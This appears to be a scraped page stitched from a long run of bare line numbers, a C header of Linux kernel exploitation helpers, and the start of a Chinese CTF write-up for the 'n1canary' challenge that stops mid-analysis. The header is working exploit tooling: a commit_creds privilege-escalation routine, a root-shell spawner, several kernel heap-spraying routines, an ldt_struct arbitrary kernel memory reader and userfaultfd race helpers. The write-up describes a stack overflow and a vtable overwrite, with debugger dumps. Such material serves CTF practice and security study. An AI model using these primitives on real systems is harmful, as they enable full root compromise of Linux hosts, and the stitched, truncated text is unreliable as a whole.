454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

int print_hex(void *p, int size){
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
puts("[*] Checking for root...");

if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/* for ret2usr attacker */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
void *(*prepare_kernel_cred_ptr)(void *) =
(void *(*)(void*)) prepare_kernel_cred;
int (*commit_creds_ptr)(void *) = (int (*)(void*)) commit_creds;
(*commit_creds_ptr)((*prepare_kernel_cred_ptr)(NULL));
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/**
* II - fundamental kernel structures
* e.g. list_head
*/
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
* III - pgv pages sprayer related
* not that we should create two process:
* - the parent is the one to send cmd and get root
* - the child creates an isolate userspace by calling unshare_setup(),
* receiving cmd from parent and operates it only
*/
#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

/* operations type */
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
/* tpacket version for setsockopt */
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
{
perror("[-] socket (AF_PACKET)");
exit(1);
}

int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_VERSION)");
exit(1);
}

struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (rv < 0)
{
perror("[-] setsockopt (PACKET_RX_RING)");
exit(1);
}

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_halen = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
{
perror("[-] bind (AF_PACKET)");
exit(1);
}

return s;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

/* the child, handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

/* init pgv-exploit subsystem :) */
void prepare_pgv_system(void)
{
/* pipe for pgv */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

/* child process for pages spray */
if (!fork()) {
spray_cmd_handler();
}
}

/**
* IV - keyctl related
*/

/**
* The MUSL also doesn't contain `keyctl.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

int key_alloc(char *description, void *payload, size_t plen)
{
return syscall(__NR_add_key, "user", description, payload, plen,
KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int keyid, void *payload, size_t plen)
{
return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}

int key_read(int keyid, void *buffer, size_t buflen)
{
return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}

int key_revoke(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}

int key_unlink(int keyid)
{
return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[i]) < 0) {
printf("[x] failed to create no.%d socket pair!\n", i);
return -1;
}
}

return 0;
}

int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (write(sk_socket[i][0], buf, size) < 0) {
printf("[x] failed to spray %d sk_buff for %d socket!", j, i);
return -1;
}
}
}

return 0;
}

int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
if (read(sk_socket[i][1], buf, size) < 0) {
puts("[x] failed to received sk_buff!");
return -1;
}
}
}

return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
* the msgp should be a pointer to the `struct msgbuf`,
* and the data should be stored in msgbuf.mtext
*/
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
* Somethings we may want to compile the exp binary with MUSL-GCC, which
* doesn't contain the `asm/ldt.h` file.
* As the file is small, I copy that directly to here :)
*/

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
* Because this bit is not present in 32-bit user code, user
* programs can pass uninitialized values here. Therefore, in
* any context in which a user_desc comes from a 32-bit program,
* the kernel must act as though lm == 0, regardless of the
* actual value.
*/
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/* desc initializer */
static inline void init_desc(struct user_desc *desc)
{
/* init descriptor info */
desc->base_addr = 0xff0000;
desc->entry_number = 0x8000 / 8;
desc->limit = 0;
desc->seg_32bit = 0;
desc->contents = 0;
desc->limit_in_pages = 0;
desc->lm = 0;
desc->read_exec_only = 0;
desc->seg_not_present = 0;
desc->useable = 0;
}

/**
* @brief burte-force hitting page_offset_base by modifying ldt_struct
*
* @param ldt_cracker function to make the ldt_struct modifiable
* @param cracker_args args of ldt_cracker
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param burte_size size of each burte-force hitting
* @return size_t address of page_offset_base
*/
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
void *cracker_args,
void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args,
uint64_t burte_size)
{
struct user_desc desc;
uint64_t page_offset_base = 0xffff888000000000;
uint64_t temp;
char *buf;
int retval;

/* init descriptor info */
init_desc(&desc);

/* make the ldt_struct modifiable */
ldt_cracker(cracker_args);
syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

/* leak kernel direct mapping area by modify_ldt() */
while(1) {
ldt_momdifier(momdifier_args, page_offset_base);
retval = syscall(SYS_modify_ldt, 0, &temp, 8);
if (retval > 0) {
break;
}
else if (retval == 0) {
printf("[x] no mm->context.ldt!");
page_offset_base = -1;
break;
}
page_offset_base += burte_size;
}

return page_offset_base;
}

/**
* @brief read the contents from a specific kernel memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param addr address of kernel memory to read
* @param res_buf buf to be written the data from kernel memory
*/
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, size_t addr, char *res_buf)
{
static char buf[0x8000];
struct user_desc desc;
uint64_t temp;
int pipe_fd[2];

/* init descriptor info */
init_desc(&desc);

/* modify the ldt_struct->entries to addr */
ldt_momdifier(momdifier_args, addr);

/* read data by the child process */
pipe(pipe_fd);
if (!fork()) {
/* child */
syscall(SYS_modify_ldt, 0, buf, 0x8000);
write(pipe_fd[1], buf, 0x8000);
exit(0);
} else {
/* parent */
wait(NULL);
read(pipe_fd[0], res_buf, 0x8000);
}

close(pipe_fd[0]);
close(pipe_fd[1]);
}

/**
* @brief seek specific content in the memory.
* Note that we should call ldtGuessingDirectMappingArea() firstly,
* and the function should be used in that caller process
*
* @param ldt_momdifier function to modify the ldt_struct->entries
* @param momdifier_args args of ldt_momdifier
* @param page_offset_base the page_offset_base we leakked before
* @param mem_finder your own function to search on a 0x8000-bytes buf.
* It should be like `size_t func(void *args, char *buf)` and the `buf`
* is where we store the data from kernel in ldt_seeking_memory().
* The return val should be the offset of the `buf`, `-1` for failure
* @param finder_args your own function's args
* @return size_t kernel addr of content to find, -1 for failure
*/
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
void *momdifier_args, uint64_t page_offset_base,
size_t (*mem_finder)(void*, char *), void *finder_args)
{
static char buf[0x8000];
size_t search_addr, result_addr = -1, offset;

search_addr = page_offset_base;

while (1) {
ldt_arbitrary_read(ldt_momdifier, momdifier_args, search_addr, buf);

offset = mem_finder(finder_args, buf);
if (offset != -1) {
result_addr = search_addr + offset;
break;
}

search_addr += 0x8000;
}

return result_addr;
}

/**
* VIII - userfaultfd related code
*/

/**
* The MUSL also doesn't contain `userfaultfd.h` :(
* Luckily we just need a bit of micros in exploitation,
* so just define them directly is okay :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* read() structure */
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
void *buf, unsigned long len)
{
register_userfaultfd(monitor_thread, buf, len,
uffd_handler_for_stucking_thread);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; //struct mutex lock;
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

n1canary

1
2
3
4
5
6
a.out: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=c1041d9d57f3f4dc0ad3e3ebb251ea748a0832d8, for GNU/Linux 4.4.0, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,Partial RELRO,Canary,NX

漏洞分析

栈溢出漏洞:

1
2
3
puts("input something to pwn :)");
ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>((__int64)v3, (__int64)&v2);
puts(v3);
1
2
3
4
__int64 __fastcall BOFApp::launch(void)::{lambda(char *)#1}::operator()(__int64 a1, __int64 a2)
{
return _isoc23_scanf((__int64)"%[^\n]", a2);
}

有后门函数:

1
2
3
4
__int64 backdoor(void)
{
return system("/readflag");
}

入侵思路

程序自定义了一个栈保护,使用 sys_getrandom 获取随机数生成 canary,这个 canary 几乎是不可能绕过的

程序使用了智能指针 unique_ptr,因此在当前语句块结束时会调用 BOFApp 的析构函数:

1
2
3
4
std::make_unique<BOFApp>((__int64)v6);
v4 = std::unique_ptr<BOFApp>::operator->((__int64)v6);
(*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 16LL))(v4);
std::unique_ptr<BOFApp>::~unique_ptr((__int64)v6);

并且 BOFApp 类本身具有虚函数,其虚表可以被我们覆盖:

1
2
3
4
5
6
7
8
9
10
pwndbg> telescope 0x7ffe4b0afa80
00:0000│ rax rdi 0x7ffe4b0afa80 ◂— 0x0
... ↓ 7 skipped
08:00400x7ffe4b0afac0 ◂— 0x0
09:00480x7ffe4b0afac8 ◂— 0xda64322f1f19d59
0a:00500x7ffe4b0afad0 —▸ 0x7ffe4b0afc28 —▸ 0x7ffe4b0b02a6 ◂— 'HTTP_PROXY=http://127.0.0.1:7890/'
0b:00580x7ffe4b0afad8 ◂— 0x7c3b282cea4eec00
0c:00600x7ffe4b0afae0 —▸ 0x7ffe4b0afc18 —▸ 0x7ffe4b0b029e ◂— 0x74756f2e612f2e /* './a.out' */
0d:00680x7ffe4b0afae8 —▸ 0x403407 (main+103) ◂— mov rax, rsp
0e:00700x7ffe4b0afaf0 —▸ 0x6b3730 —▸ 0x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
1
2
3
4
pwndbg> telescope 0x4ed510
00:00000x4ed510 (__preinit_array_start+48) —▸ 0x40388c (BOFApp::~BOFApp()) ◂— sub rsp, 18h
